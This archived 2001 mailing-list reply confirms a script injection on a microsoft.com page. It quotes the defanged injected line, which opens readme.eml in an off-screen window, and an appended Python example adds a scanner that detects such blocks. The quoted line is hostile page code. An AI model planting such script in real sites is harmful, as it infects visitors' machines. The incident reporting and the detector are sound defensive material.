Security Incidents mailing list archives

Re: Please tell me I'm wrong: microsoft.com infected


From: "Michael H. Warfield" <mhw () wittsend com>
Date: Wed, 19 Sep 2001 17:54:03 -0400

On Wed, Sep 19, 2001 at 03:37:39PM -0400, Steve Cody wrote:
> I just went to http://www.microsoft.com/frontpage, and my Symantec
> Norton Antivirus popped up and denied access to readme.eml.
>
> I could not view the source of the loaded page, so I can't verify that
> it is definitely infected.

        Yes, indeedie do.  Just did a wget http://www.microsoft.com/frontpage
and here is what's on da bottom:

[html][script language="JavaScript"]window.open("readme.eml", null, "resizable=no,top=6000,left=6000")[/script][/html]

        Defanged by turning angle brackets into square brackets even though
it's not in an html attachment.  ;-)

> Steve


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw () WittsEnd com
  (The Mad Wizard)      |  (678) 463-0932   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!
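
An added example, not part of the original message or of either poster's tooling: a Python check that flags script blocks opening an .eml file through window.open, in live or bracket-defanged form, as in the line quoted in the message. The function names, the 3000-pixel off-screen threshold and the file extensions scanned are assumptions of this example.

```python
import os
import re

# Script blocks, live (<script>) or defanged with square brackets ([script]).
SCRIPT_RE = re.compile(
    r"[<\[]script\b[^>\]]*[>\]](.*?)[<\[]/script\s*[>\]]", re.I | re.S)
# window.open("<name>.eml" ...): group 2 is the target, group 3 the other args.
OPEN_RE = re.compile(r"""window\.open\(\s*(["'])([^"']+\.eml)\1([^)]*)\)""", re.I)
COORD_RE = re.compile(r"\b(?:top|left)\s*=\s*(-?\d+)", re.I)
OFFSCREEN_PX = 3000  # assumption: a top/left this large puts the window off screen

# Constructed sample: the defanged line quoted in the message.
SAMPLE_DEFANGED = ('[html][script language="JavaScript"]window.open("readme.eml", '
                   'null, "resizable=no,top=6000,left=6000")[/script][/html]')


def scan_html(text):
    """Return [(eml_target, opened_offscreen)] for each suspicious call."""
    findings = []
    for script in SCRIPT_RE.finditer(text):
        for call in OPEN_RE.finditer(script.group(1)):
            coords = [int(v) for v in COORD_RE.findall(call.group(3))]
            offscreen = any(v < 0 or v >= OFFSCREEN_PX for v in coords)
            findings.append((call.group(2), offscreen))
    return findings


def scan_tree(root, exts=(".htm", ".html", ".asp")):
    """Walk a web root and return {path: findings} for pages that match."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_html(fh.read())
                if found:
                    hits[path] = found
    return hits


if __name__ == "__main__":
    print(scan_html(SAMPLE_DEFANGED))
```
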

